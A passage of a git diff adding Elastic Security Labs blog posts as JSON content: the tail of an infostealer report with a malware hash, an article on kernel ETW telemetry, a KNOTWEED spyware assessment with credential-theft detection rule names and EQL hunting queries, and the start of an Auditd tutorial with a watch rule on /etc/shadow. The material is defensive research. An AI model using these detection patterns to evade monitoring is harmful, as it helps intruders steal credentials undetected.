b74733d68e95220ab0630a68ddf973b0c959fd421628e639c1b91e465ba9299b | SHA-256 | XenoStealer.exe | XENOSTEALER |\n\n\n## References\nThe following were referenced throughout the above research:\n\n - [https://developer.chrome.com/release-notes/127](https://developer.chrome.com/release-notes/127)\n- 
[https://security.googleblog.com/2024/07/improving-security-of-chrome-cookies-on.html](https://security.googleblog.com/2024/07/improving-security-of-chrome-cookies-on.html)\n"
+ },
+ "title": "Katz and Mouse Game: MaaS Infostealers Adapt to Patched Chrome Defenses",
+ "slug": "katz-and-mouse-game",
+ "date": "2024-10-28",
+ "description": "Elastic Security Labs breaks down bypass implementations from the infostealer ecosystem’s reaction to Chrome 127's Application-Bound Encryption scheme.",
+ "author": [
+ {
+ "slug": "jia-yu-chan"
+ },
+ {
+ "slug": "salim-bitam"
+ },
+ {
+ "slug": "daniel-stepanic"
+ },
+ {
+ "slug": "samir-bousseaden"
+ },
+ {
+ "slug": "cyril-francois"
+ },
+ {
+ "slug": "seth-goodwin"
+ }
+ ],
+ "image": "Security Labs Images 2.jpg",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "infostealer",
+ "chrome",
+ "cookie",
+ "VIDAR",
+ "STEALC",
+ "LUMMA",
+ "METASTEALER",
+ "PHEMEDRONE",
+ "XENOSTEALER"
+ ]
+ },
+ "id": "security_labs_content-katz_and_mouse_game-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-kernel_etw_best_etw-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-kernel_etw_best_etw-md.json
new file mode 100644
index 00000000000..c3e317bdc9a
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-kernel_etw_best_etw-md.json
@@ -0,0 +1,30 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Kernel ETW is the best ETW\"\nslug: \"kernel-etw-best-etw\"\ndate: \"2024-09-13\"\ndescription: \"This research focuses on the importance of native audit logs in secure-by-design software, emphasizing the need for kernel-level ETW logging over user-mode hooks to enhance anti-tamper protections.\"\nauthor:\n - slug: john-uhlmann\nimage: \"kernel-etw-best-etw.jpg\"\ncategory:\n - slug: perspectives\ntags:\n - kernel\n - ETW\n - Windows\n - OS\n---\n\n## Preamble\n\nA critical feature of secure-by-design software is the generation of audit logs when privileged operations are performed. These native audit logs can include details of the internal software state, which are impractical for third-party security vendors to bolt on after the fact.\n\nMost Windows components generate logs using [Event Tracing for Windows](https://learn.microsoft.com/en-us/windows/win32/etw/about-event-tracing) (ETW). These events expose some of Windows's inner workings, and there are scenarios when endpoint security products benefit from subscribing to them. For security purposes, though, not all ETW providers are created equal.\n\nThe first consideration is typically the reliability of the event provider itself - in particular, where the logging happens. Is it within the client process and [trivially vulnerable to ETW tampering](https://twitter.com/dez_/status/938074904666271744)? Or is it perhaps slightly safer over in an RPC server process? Ideally, though, the telemetry will come from the [kernel](https://www.elastic.co/security-labs/doubling-down-etw-callstacks). Given the user-to-kernel security boundary, this provides stronger anti-tamper guarantees over in-process telemetry. This is Microsoft’s recommended approach. 
Like Elastic Endpoint, Microsoft Defender for Endpoint also uses kernel ETW in preference to fragile user-mode `ntdll` hooks.\n\nFor example, an adversary might be able to easily avoid an in-process user-mode hook on `ntdll!NtProtectVirtualMemory`, but bypassing a kernel [PROTECTVM](https://github.com/search?type=code&q=repo:jdu2600/Windows10EtwEvents+PROTECTVM) ETW event is significantly harder. Or, at least, [it should be](https://www.elastic.co/security-labs/forget-vulnerable-drivers-admin-is-all-you-need).\n\n\n\nThe Security Event Log is effectively just persistent storage for the events from the Microsoft-Windows-Security-Auditing ETW provider. Surprisingly, [Security Event 4688](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4688) for process creation is not a kernel event. The kernel dispatches the data to the Local Security Authority (`lsass.exe`) service, emitting an ETW event for the Event Log to consume. So, the data could be tampered with from within that server process. Contrast this with the `ProcessStart` event from the Microsoft-Windows-Kernel-Process provider, which is logged directly by the kernel and requires kernel-level privileges to interfere with.\n\nThe second consideration is then the reliability of the information being logged. You might trust the event source, but what if it is just [blindly logging](https://www.elastic.co/security-labs/effective-parenting-detecting-lrpc-based-parent-pid-spoofing) [client-supplied data](https://labs.withsecure.com/publications/spoofing-call-stacks-to-confuse-edrs) that is extrinsic to the event being logged?\n\nIn this article, we’ll focus on kernel ETW events. 
These are typically the most security-relevant because they are difficult to bypass and often pertain to privileged actions being performed on behalf of a client thread.\n\nWhen Microsoft introduced Kernel Patch Protection, security vendors were significantly constrained in their ability to monitor the kernel. Given the limited number of kernel extension points provided by Microsoft, they were increasingly compelled to rely on asynchronous ETW events for after-the-fact visibility of kernel actions performed on behalf of malware. \n\nGiven this dependency, the public documentation of Windows kernel telemetry sources is unfortunately somewhat sparse.\n\n\n\n## Kernel ETW Events\n\nThere are currently [four types of ETW providers](https://learn.microsoft.com/en-us/windows/win32/etw/about-event-tracing#types-of-providers) that we need to consider. \n\nFirstly, there are legacy and modern variants of “event provider”:\n\n* legacy ([mof](https://learn.microsoft.com/en-us/windows/win32/wmisdk/managed-object-format--mof-)-based) event providers\n* modern ([manifest](https://learn.microsoft.com/en-us/windows/win32/wes/writing-an-instrumentation-manifest)-based) event providers\n\nAnd then there are legacy and modern variants of “trace provider”:\n\n* legacy Windows software trace preprocessor ([WPP](https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/wpp-software-tracing)) trace providers\n* modern [TraceLogging](https://learn.microsoft.com/en-us/windows/win32/tracelogging/trace-logging-about) trace providers\n\nThe “event” versus “trace” distinction is mostly semantic. Event providers are typically registered with the operating system ahead of time, and you can inspect the available telemetry metadata. These are typically used by system administrators for troubleshooting purposes and are often semi-documented. But when something goes really, _really_ wrong there are (hidden) trace providers. 
These are typically used only by the original software authors for advanced troubleshooting and are undocumented.\n\nIn practice, each uses a slightly different format file to describe and register its events and this introduces minor differences in how the events are logged - and, more importantly, how the potential events can be enumerated.\n\n### Modern Kernel Event Providers\n\nThe modern kernel ETW providers aren’t strictly documented. However, registered event details can be queried from the operating system via the [Trace Data Helper API](https://learn.microsoft.com/en-us/windows/win32/api/tdh/). Microsoft’s [PerfView](https://github.com/microsoft/perfview) tool uses these APIs to reconstruct the provider’s [registration manifest](https://github.com/microsoft/perfview/blob/319be737115e01f77c42804cd1d41755211347f3/src/TraceEvent/RegisteredTraceEventParser.cs#L88), and Pavel Yosifovich’s [EtwExplorer](https://github.com/zodiacon/EtwExplorer) then wraps these manifests in a simple GUI. You can use these [tab-separated value files](https://github.com/jdu2600/Windows10EtwEvents/tree/master/manifest) of registered manifests from successive Windows versions. A single line per event is very useful for grepping, though others have since published the [raw XML manifests](https://github.com/nasbench/EVTX-ETW-Resources/tree/main/ETWProvidersManifests).\n\nThese aren’t all of the possible Windows ETW events, however. They are only the ones registered with the operating system by default. For example, the ETW events for many [server roles aren’t registered](https://github.com/nasbench/EVTX-ETW-Resources/issues/52) until that feature is enabled.\n\n### Legacy Kernel Event Providers\n\nThe [legacy kernel events](https://docs.microsoft.com/en-us/windows/win32/etw/msnt-systemtrace) are documented by Microsoft. Mostly.\n\nLegacy providers also exist within the operating system as WMI [EventTrace](https://learn.microsoft.com/en-us/windows/win32/etw/eventtrace) classes. 
Providers are the root classes, groups are the children, and events are the grandchildren.\n\n\n\nTo search legacy events in the same way as modern events, these classes were parsed and the original MOF (mostly) reconstructed. This [MOF support was added to EtwExplorer](https://github.com/zodiacon/EtwExplorer/pull/3) and [tab-separated value summaries](https://github.com/jdu2600/Windows10EtwEvents/tree/master/mof) of the legacy events published. \n\n\n\nThe fully reconstructed Windows Kernel Trace MOF is [here](https://gist.github.com/jdu2600/a2b03e4e9cf19282a41ad766388c9856) (or in a tabular format [here](https://github.com/jdu2600/Windows10EtwEvents/blob/master/mof/Windows_Kernel_Trace.tsv)).\n\nOf the 340 registered legacy events, only 116 were documented. Typically, each legacy event needs to be enabled via a specific flag, but these weren’t documented either. There was a clue in the documentation for the kernel [Object Manager Trace](https://learn.microsoft.com/en-us/windows/win32/etw/obtrace) events. It mentioned `PERF_OB_HANDLE`, a constant that is not defined in the headers in the latest SDK. Luckily, [Geoff Chappell](https://geoffchappell.com/studies/windows/km/ntoskrnl/api/etw/tracesup/perfinfo_groupmask.htm) and the Windows 10 1511 WDK came to the rescue. This information was used to add support for `PERFINFO_GROUPMASK` kernel trace flags to Microsoft’s [KrabsETW](https://github.com/microsoft/krabsetw/blob/master/examples/NativeExamples/kernel_trace_002.cpp) library. It also turned out that the Object Trace documentation was wrong. That non-public constant can only be used with an undocumented API extension. 
Fortunately, public Microsoft projects such as `PerfView` often provide [examples of how to use undocumented APIs](https://github.com/microsoft/perfview/blob/51ec1dffe9055ab58ba1b13d1b716b36760ed895/src/TraceEvent/ETWKernelControl.cs#L464-L469).\n\nWith both manifests and MOFs published on GitHub, most kernel events can now be found with [this query](https://github.com/search?type=code&q=repo:jdu2600/Windows10EtwEvents+kernel).\n\nInterestingly, Microsoft often [obfuscates](https://en.wikipedia.org/wiki/Security_through_obscurity) the names of security-relevant events, so searching for events with a generic name prefix such as `task_` yields some [interesting results](https://github.com/search?type=code&q=repo:jdu2600/Windows10EtwEvents+kernel+task_).\n\nSometimes the keyword hints at the event’s purpose. For example, `task_014` in `Microsoft-Windows-Kernel-General` is enabled with the keyword `KERNEL_GENERAL_SECURITY_ACCESSCHECK`.\n\nAnd thankfully, the parameters are almost always well-named. We might guess that `task_05` in `Microsoft-Windows-Kernel-Audit-API-Calls` is related to [OpenProcess](https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess) since it logs fields named `TargetProcessId` and `DesiredAccess`.\n\n[Another useful query](https://github.com/search?type=code&q=repo:jdu2600/Windows10EtwEvents+kernel+processstartkey) is to search for events with an explicit `ProcessStartKey` field. ETW events can be [configured](https://learn.microsoft.com/en-us/windows/win32/api/evntrace/ns-evntrace-enable_trace_parameters) to include this field for the logging process, and any event that includes this information for another process is often security relevant.\n\nIf you had a specific API in mind, you might query for its name or its parameters. 
For example, if you want Named Pipe events, you might use [this query](https://github.com/search?type=code&q=repo:jdu2600/Windows10EtwEvents+kernel+namedpipe).\n\nIn this instance, though, `Microsoft-Windows-SEC` belongs to the built-in Microsoft Security drivers that Microsoft Defender for Endpoint (MDE) utilizes. This provider is only officially available to MDE, though [Sebastian Feldmann and Philipp Schmied](https://www.youtube.com/watch?v=tuoA3KGKf7o) have demonstrated how to start a session using an [AutoLogger](https://learn.microsoft.com/en-us/windows/win32/etw/configuring-and-starting-an-autologger-session) and subscribe to that session’s events. This is currently only useful for MDE users, as the driver is otherwise not configured to emit events.\n\nBut what about trace providers?\n\n### Modern Kernel Trace Providers\n\nTraceLogging metadata is stored as an opaque blob within the logging binary. Thankfully, this format has been reversed by [Matt Graeber](https://posts.specterops.io/data-source-analysis-and-dynamic-windows-re-using-wpp-and-tracelogging-e465f8b653f7). We can use Matt’s script to dump all TraceLogging metadata for `ntoskrnl.exe`. A sample dump of Windows 11 TraceLogging metadata is [here](https://gist.github.com/jdu2600/288475bc43ea68636c28cb25ddeb934f).\n\nUnfortunately, the metadata structure alone doesn’t retain the correlation between providers and events. There are interesting provider names, such as `Microsoft.Windows.Kernel.Security` and `AttackSurfaceMonitor`, but it’s not yet clear from our metadata dump which events belong to these providers.\n\n### Legacy Kernel Trace Providers\n\nWPP metadata is stored within symbol files (PDBs). Microsoft includes this information in the [public symbols for some, but not all, drivers](https://techcommunity.microsoft.com/t5/microsoft-usb-blog/how-to-include-and-view-wpp-trace-messages-in-a-driver-8217-s/ba-p/270778). The kernel itself, however, does not produce any WPP events. 
Instead, the legacy Windows Kernel Trace event provider can be passed undocumented flags to enable the legacy “trace” events usually only available to Microsoft kernel developers.\n\n| Provider | Documentation | Event Metadata |\n|------------------------|---------------|------------------------------|\n| Modern Event Providers | None | [Registered XML manifests](https://github.com/microsoft/perfview/blob/51ec1dffe9055ab58ba1b13d1b716b36760ed895/src/TraceEvent/RegisteredTraceEventParser.cs#L81-L529) |\n| Legacy Event Providers | Partial | [EventTrace WMI objects](https://learn.microsoft.com/en-us/windows/win32/etw/retrieving-event-data-using-mof) |\n| Modern Trace Providers | None | [Undocumented blob in binary](https://gist.github.com/mattifestation/edbac1614694886c8ef4583149f53658) |\n| Legacy Trace Providers | None | [Undocumented blob in Symbols](https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/trace-message-format-file) |\n\n## Next Steps\n\nWe now have kernel event metadata for each of the four flavours of ETW provider, but a list of ETW events is just our starting point. Knowing the provider and event keyword may not be enough to generate the events we expect. Sometimes, an additional configuration registry key or API call is required. More often, though, we just need to understand the exact conditions under which the event is logged.\n\nKnowing exactly where and what is being logged is critical to truly understanding your telemetry and its limitations. And, thanks to decompilers becoming readily available, we have the option of some just-enough-reversing available to us. In IDA we call this “press F5”. Ghidra is the open-source alternative and it supports scripting … with Java.\n\nFor kernel ETW, we are particularly interested in `EtwWrite` calls that are reachable from system calls. We want as much of the call site parameter information as possible, including any associated public symbol information. 
This meant that we needed to walk the call graph but also attempt to resolve the possible values for particular parameters.\n\n\n\n\n\nThe necessary parameters were the `RegHandle` and the `EventDescriptor`. The former is an opaque handle for the provider, and the latter provides event-specific information, such as the event id and its associated keywords. An ETW keyword is an identifier used to enable a set of events. \n\nEven better, these event descriptors were typically stored in a global constant with a public symbol.\n\n\n\nWe had sufficient event metadata but still needed to resolve the opaque provider handle assigned at runtime back to the metadata about the provider. For this, we also needed the `EtwRegister` calls.\n\n\n\n\n\nThe typical pattern for modern kernel event providers was to store the constant provider GUID and the runtime handle in globals with public symbols.\n\nAnother pattern encountered was calls to `EtwRegister`, `EtwWrite`, and `EtwUnregister`, all in the same function. In this case, we took advantage of the locality to find the provider GUID for the event.\n\nModern TraceLogging providers did not have associated per-provider public symbols to provide a hint of each provider’s purpose. However, Matt Graeber had [reversed the TraceLogging metadata](https://posts.specterops.io/data-source-analysis-and-dynamic-windows-re-using-wpp-and-tracelogging-e465f8b653f7) format and documented that the provider name is stored at a [fixed offset](https://gist.github.com/mattifestation/edbac1614694886c8ef4583149f53658#file-tlgmetadataparser-psm1-L461-L473) from the provider GUID. Having the exact provider name is even better than just the public symbol we recovered for modern events.\n\n\n\nThis just left the legacy providers. They didn’t seem to have either public symbols or metadata blobs. 
Some constants are passed to an undocumented function named `EtwTraceKernelEvent` which wraps the eventual ETW write call.\n\n\n\nThose constants are present in the Windows 10 1511 WDK headers (and the [System Informer](https://github.com/winsiderss/systeminformer/blob/7ad69bf13d31892a89be7230bdbd47ffde024a2b/phnt/include/ntwmi.h#L725) headers), so we could label these events with the constant names.\n\n\n\nThis script has been recently updated for Ghidra 11, along with improved support for TraceLogging and Legacy events. You can now find it on GitHub here - [https://github.com/jdu2600/API-To-ETW](https://github.com/jdu2600/API-To-ETW)\n\nSample output for the Windows 11 kernel is [here](https://github.com/jdu2600/API-To-ETW/blob/main/ntoskrnl.exe.csv).\n\nOur previously anonymous `Microsoft-Windows-Kernel-Audit-API-Calls` events are quickly unmasked by this script.\n\n| Id | EVENT_DESCRIPTOR Symbol | Function |\n|----|-----------------------------------------------------------|------------------------------------------|\n| 1 | KERNEL_AUDIT_API_PSSETLOADIMAGENOTIFYROUTINE | PsSetLoadImageNotifyRoutineEx |\n| 2 | KERNEL_AUDIT_API_TERMINATEPROCESS | NtTerminateProcess |\n| 3 | KERNEL_AUDIT_API_CREATESYMBOLICLINKOBJECT | ObCreateSymbolicLink |\n| 4 | KERNEL_AUDIT_API_SETCONTEXTTHREAD | NtSetContextThread |\n| 5 | KERNEL_AUDIT_API_OPENPROCESS | PsOpenProcess |\n| 6 | KERNEL_AUDIT_API_OPENTHREAD | PsOpenThread |\n| 7 | KERNEL_AUDIT_API_IOREGISTERLASTCHANCESHUTDOWNNOTIFICATION | IoRegisterLastChanceShutdownNotification |\n| 8 | KERNEL_AUDIT_API_IOREGISTERSHUTDOWNNOTIFICATION | IoRegisterShutdownNotification |\n\nSymbol and containing function for Microsoft-Windows-Kernel-Audit-API-Calls events\n\nWith the call path and parameter information recovered by the script, we can also see that the `SECURITY_ACCESSCHECK` event from earlier is associated with the [SeAccessCheck](https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-seaccesscheck) kernel API, 
but only logged within a function named `SeLogAccessFailure`. Only logging failure conditions is a very common occurrence with ETW events. For troubleshooting purposes, the original ETW use case, these are typically the most useful and the implementation in most components reflects this. Unfortunately, for security purposes, the inverse is often true. The successful operation logs are usually more useful for finding malicious activity. So, the value of some of these legacy events is often low.\n\nModern [Secure by Design](https://www.cisa.gov/resources-tools/resources/secure-by-design) practice is to audit log both success and failure for security relevant activities and Microsoft continues to add new security-relevant ETW events that do this. For example, the preview build of Windows 11 24H2 includes some [interesting new ETW events](https://windows-internals.com/an-end-to-kaslr-bypasses/) in the `Microsoft-Windows-Threat-Intelligence` provider. Hopefully, these will be documented for security vendors ahead of its release. \n\nRunning this decompiler script across interesting Windows drivers and service DLLs is left as an exercise to the reader."
+ },
+ "title": "Kernel ETW is the best ETW",
+ "slug": "kernel-etw-best-etw",
+ "date": "2024-09-13",
+ "description": "This research focuses on the importance of native audit logs in secure-by-design software, emphasizing the need for kernel-level ETW logging over user-mode hooks to enhance anti-tamper protections.",
+ "author": [
+ {
+ "slug": "john-uhlmann"
+ }
+ ],
+ "image": "kernel-etw-best-etw.jpg",
+ "category": [
+ {
+ "slug": "perspectives"
+ }
+ ],
+ "tags": [
+ "kernel",
+ "ETW",
+ "Windows",
+ "OS"
+ ]
+ },
+ "id": "security_labs_content-kernel_etw_best_etw-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-knotweed_assessment_summary-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-knotweed_assessment_summary-md.json
new file mode 100644
index 00000000000..fd4df3e4613
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-knotweed_assessment_summary-md.json
@@ -0,0 +1,27 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"KNOTWEED Assessment Summary\"\nslug: \"knotweed-assessment-summary\"\ndate: \"2022-11-30\"\ndescription: \"KNOTWEED deploys the Subzero spyware through the use of 0-day exploits for Adobe Reader and the Windows operating system. Once initial access is gained, it uses different sections of Subzero to maintain persistence and perform actions on the host.\"\nauthor:\n - slug: andrew-pease\nimage: \"blog-thumb-blind-spots.png\"\ncategory:\n - slug: security-research\n - slug: vulnerability-updates\n---\n\n## Key Takeaways\n\n- KNOTWEED is an activity group sponsored by the PSOA entity DSIRF\n\n- KNOTWEED uses 0-day exploits to load custom malware and frameworks onto victim systems\n\n- Elastic Endpoint Security prevents the execution chain of the VBA from infecting the host with spyware associated with KNOTWEED\n\n## Summary\n\nOn July 27, 2022, Microsoft Threat Intelligence Center (MSTIC) [disclosed](https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/) a private-sector offensive actor (PSOA) that is using 0-day exploits in targeted attacks against European and Central American victims. MSTIC and others are tracking this activity group as KNOTWEED.\n\nPSOAs sell hacking tools, malware, exploits, and services. KNOTWEED is produced by the PSOA named [DSIRF](https://web.archive.org/web/20220713203741/https:/dsirf.eu/about/). DSIRF has been linked to the sale of a malicious toolset (among others) called Subzero which has been observed being deployed through the use of 0-day exploits targeting Adobe and the Windows operating system.\n\nMSTIC has observed victims in the legal, financial, and NGO verticals in Europe and Latin America.\n\n## Assessment\n\n### Risk\n\nKNOTWEED deploys the Subzero spyware through the use of 0-day exploits for Adobe Reader and the Windows operating system. 
Once initial access is gained, KNOTWEED uses different sections of Subzero to maintain persistence (Jumplump) and to perform actions on the infected host (Corelump).\n\nSuccessful execution of the Subzero spyware allows for the clandestine collection of sensitive information such as credential pairs, system locations, internal reconnaissance, and other remote access capabilities common among spyware.\n\n### Impact\n\nPSOAs are commonly used by activity groups as a way to “leapfrog” capabilities in exploiting and attacking well-defended targets. These activity groups include national intelligence and law enforcement organizations performing sanctioned operations, as well as oppressive governments as a way to collect information on journalists, political dissidents, and activists.\n\nSuccessful execution of the Subzero spyware payload could put targets in danger of physical harm or persecution from non-law enforcement organizations.\n\n### Countermeasures\n\n**Elastic Protections** \nAttempts to use a Visual Basic for Applications (VBA) script for initial execution generates a **Memory Threat Prevention Alert: Shellcode Injection** event. This would stop the execution chain from proceeding and prevent the Subzero spyware from infecting the host.\n\n\n\n\n\nAs of this writing, 4 of the indicators provided by MSTIC were detected by the Elastic malware scoring model as being malicious. The 4 files are used for initial execution (the VBA), credential theft (PassLib), a modular hacking tool (Mex), and the main malware (Corelump). 
Indicators that were undetected were variations of the persistence loader (Jumplump).\n\nWhile the persistence loader is not detected as malicious, the initial execution prevention of the VBA stops the malware from getting to the persistence phase of the infection.\n\nAll files have been tagged as malicious and will be reflected in the next malware model.\n\n**Elastic Detections**\n\nThe following existing public Detection Rules would have identified the main persistence method used by the JumpLump malware and other post-exploitation techniques:\n\n- [Modification of WDigest Security Provider](https://github.com/elastic/detection-rules/blob/main/rules/windows/credential_access_mod_wdigest_security_provider.toml)\n- [Potential Credential Access via Windows Utilities](https://github.com/elastic/detection-rules/blob/main/rules/windows/credential_access_cmdline_dump_tool.toml)\n- [Component Object Model Hijacking](https://github.com/elastic/detection-rules/blob/main/rules/windows/persistence_suspicious_com_hijack_registry.toml)\n\n\n\n**Hunting Queries**\n\nThe following EQL queries can be used to hunt for additional behaviors related to JumpLump:\n\n_Abnormally large JPEG dropped by Jumplump:_\n\n```\nfile where event.action != \"deletion\" and\nprocess.executable : \"?:\\\\Windows\\\\System32\\\\*.exe\" and\nfile.path : \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*.jpg\" and file.name regex \"\"\"[0-9]{17}\\.jpg\"\"\" and file.size >= 1000000\n```\n\n\n\n_Image load or PE file creation in the print spooler color directory:_\n\n```\nany where event.category in (\"file\", \"library\") and (file.path : \"?:\\\\Windows\\\\system32\\\\spool\\\\drivers\\\\color\\\\*.dll\" or dll.path : \"?:\\\\Windows\\\\system32\\\\spool\\\\drivers\\\\color\\\\*.dll\")\n```\n\n\n\n**Observations**\n\nWhile there have been no customer observations in Elastic telemetry, this is not unexpected, as this activity group has been observed targeting particular victims and the attack pattern 
or intrusion set appears to be very niche and not widespread. Elastic Security will continue to observe the threat actor and update our readers accordingly.\n\n## Terminology\n\n- **0-day exploit** - an exploit for a vulnerability that is previously unknown to defenders and does not have a public patch\n- **Activity Group** - individuals, groups, or organizations believed to be operating with malicious intent\n- **Attack Pattern** - ways that adversaries attempt to compromise targets\n- **Intrusion Set** - adversarial behaviors and resources with common properties that are believed to be orchestrated by a single organization\n\n## References\n\n- https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/\n"
+ },
+ "title": "KNOTWEED Assessment Summary",
+ "slug": "knotweed-assessment-summary",
+ "date": "2022-11-30",
+ "description": "KNOTWEED deploys the Subzero spyware through the use of 0-day exploits for Adobe Reader and the Windows operating system. Once initial access is gained, it uses different sections of Subzero to maintain persistence and perform actions on the host.",
+ "author": [
+ {
+ "slug": "andrew-pease"
+ }
+ ],
+ "image": "blog-thumb-blind-spots.png",
+ "category": [
+ {
+ "slug": "security-research"
+ },
+ {
+ "slug": "vulnerability-updates"
+ }
+ ]
+ },
+ "id": "security_labs_content-knotweed_assessment_summary-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-linux_detection_engineering_with_auditd-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-linux_detection_engineering_with_auditd-md.json
new file mode 100644
index 00000000000..d1774907e00
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-linux_detection_engineering_with_auditd-md.json
@@ -0,0 +1,32 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Linux detection engineering with Auditd\"\nslug: \"linux-detection-engineering-with-auditd\"\ndate: \"2024-04-09\"\ndescription: \"In this article, learn more about using Auditd and Auditd Manager for detection engineering.\"\nauthor:\n - slug: ruben-groenewoud\nimage: \"Security Labs Images 30.jpg\"\ncategory:\n - slug: detection-science\ntags:\n - slug: linux\n - slug: auditd\n---\n\n## Introduction\n\nUnix and Linux systems operate behind the scenes, quietly underpinning a significant portion of our technological infrastructure. With the increasing complexity of threats targeting these systems, ensuring their security has become more important than ever.\n\nOne of the foundational tools in the arsenal of security detection engineers working within Unix and Linux systems is [Auditd](https://linux.die.net/man/8/auditd). This powerful utility is designed for monitoring and recording system events, providing a detailed audit trail of who did what and when. It acts as a watchdog, patrolling and recording detailed information about system calls, file accesses, and system changes, which are crucial for forensic analysis and real-time monitoring.\n\nThe objective of this article is multifaceted:\n\n 1. We aim to provide additional information regarding Auditd, showcasing its capabilities and the immense power it holds in security detection engineering.\n 2. We will guide you through setting up Auditd on your own systems, tailoring it to meet your specific monitoring needs. By understanding how to create and modify Auditd rules, you will learn how to capture the exact behavior you're interested in monitoring and interpret the resulting logs to create your own detection rules.\n 3. 
We'll introduce Auditd Manager, an integration tool that enhances Auditd’s utility by simplifying the management of Auditd across systems.\n\nBy the end of this post, you'll not only learn how to employ Auditd Manager to incorporate some of our [pre-built detection rules](https://github.com/elastic/detection-rules/tree/main/rules) into your security strategy, but also gain a comprehensive understanding of Auditd and how to leverage it to build your own detection rules as well.\n\n## Introduction to Auditd\n\nAuditd is a Linux tool designed for monitoring and recording system events to provide a comprehensive audit trail of user activities, system changes, and security access. Auditd operates by hooking into the Linux kernel, capturing detailed information about system calls and other system events as they happen. These events are then logged to a file, providing a timestamped record. Administrators can define rules that specify which events to log, offering the flexibility to focus on specific areas of interest or concern. The logged data can be used for a variety of purposes, from compliance auditing to detailed forensic analysis.\n\n## Auditd setup\n\nTo get started with Auditd, Elastic provides several options:\n\n - [Auditbeat’s Auditd module](https://www.elastic.co/guide/en/beats/auditbeat/current/auditbeat-module-auditd.html)\n - [Filebeat’s Auditd module](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-auditd.html)\n - [Elastic Agent’s Auditd Logs integration](https://docs.elastic.co/en/integrations/auditd)\n - [Elastic Agent’s Auditd Manager integration](https://docs.elastic.co/integrations/auditd_manager)\n\nIn this article, we will focus on the latter two, leveraging the [Elastic Agent](https://www.elastic.co/elastic-agent) to easily ingest logs into Elasticsearch. 
If you are new to Elasticsearch, you can easily create an [Elastic Cloud Account](https://www.elastic.co/cloud) with a 30-day trial license, or for local testing, you can download the [Elastic Container Project](https://github.com/peasead/elastic-container) and set the license value to trial in the .env file.\n\nFeel free to follow along using Auditbeat or Filebeat - for setup instructions, consult the documentation linked above. As the Auditd Logs integration works by parsing the audit.log file, you are required to install Auditd on the Linux host from which you wish to gather the logs. Depending on the Linux distribution and the package manager of choice, the Auditd package should be installed, and the Auditd service should be started and enabled. For Debian-based distributions:\n\n```\nsudo apt update\nsudo apt install auditd\nsudo systemctl start auditd\nsudo systemctl enable auditd\n```\n\nThe ```/var/log/audit/audit.log``` file should now be populated with Auditd logs. Next, you need to install the Auditd Logs integration, create an agent policy in Fleet with the newly installed integration, and apply the integration to a compatible Elastic Agent with Auditd installed. \n\n\n\n\nThe default settings should suffice for most scenarios. Next, you need to add the integration to an agent policy, and add the agent policy to the Elastic Agents from which you want to harvest data. The Elastic Agent ships the logs to the ```logs-auditd.log-[namespace]``` data stream. You can now [create a new data view](https://www.elastic.co/guide/en/kibana/current/data-views.html) to match only your incoming Auditd logs.\n \n\n\n\nYou can now explore the ingested Auditd logs. But as you will quickly notice, Auditd does not log much by default – you must leverage Auditd rules to unlock its full potential.\n\n## Auditd rules\n\nAuditd rules are directives used to specify which system activities to monitor and log, allowing for granular control over the security auditing process. 
These rules are typically configured in the ```/etc/audit/audit.rules``` file. Auditd rules come in three varieties: ```control```, ```file```, and ```syscall```. More information can be found [here](https://linux.die.net/man/7/audit.rules). \n\n### Control type rules\n\nThe control type is, in most cases, used to configure Auditd rather than specifying the events to monitor. By default, the audit rules file contains the following control type settings:\n\n```\n-D\n-b 8192\n-f 1\n--backlog_wait_time 60000\n```\n\n - ```-D```: delete all rules on launch (Auditd parses the rules in the file from top to bottom. Removing all rules on launch ensures a clean configuration).\n - ```-b 8192```: set the maximum number of outstanding audit buffers in the kernel.\n - ```-f 1```: set the failure mode of Auditd to log.\n - ```--backlog_wait_time 60000```: specify the amount of time (in ms) that the audit system will wait if the audit backlog limit is reached before dropping audit records.\n\n### File System Rules\n\nBuilding upon these default control type settings, you can create file system rules, sometimes referred to as watches. These rules allow you to monitor files of interest for read, write, change, and execute actions. A typical file system rule would look as follows:\n\n```\n-w [path-to-file] -p [permissions] -k [keyname]\n```\n\n - ```-w```: the path to the file or directory to monitor.\n - ```-p```: any of the read (r), write (w), execute (e) or change (a) permissions.\n - ```-k```: the name of a key identifier that can be used to search through the Auditd logs more easily.\n\nIf you want to monitor the ```/etc/shadow``` file for file reads, writes, and changes, and tag any such events with a key named ```shadow_access```, you could set up the following rule:\n\n```\n-w /etc/shadow -p rwa -k shadow_access\n```\n\n### System call rules\n\nAuditd’s true power is revealed when working with its system call rules. 
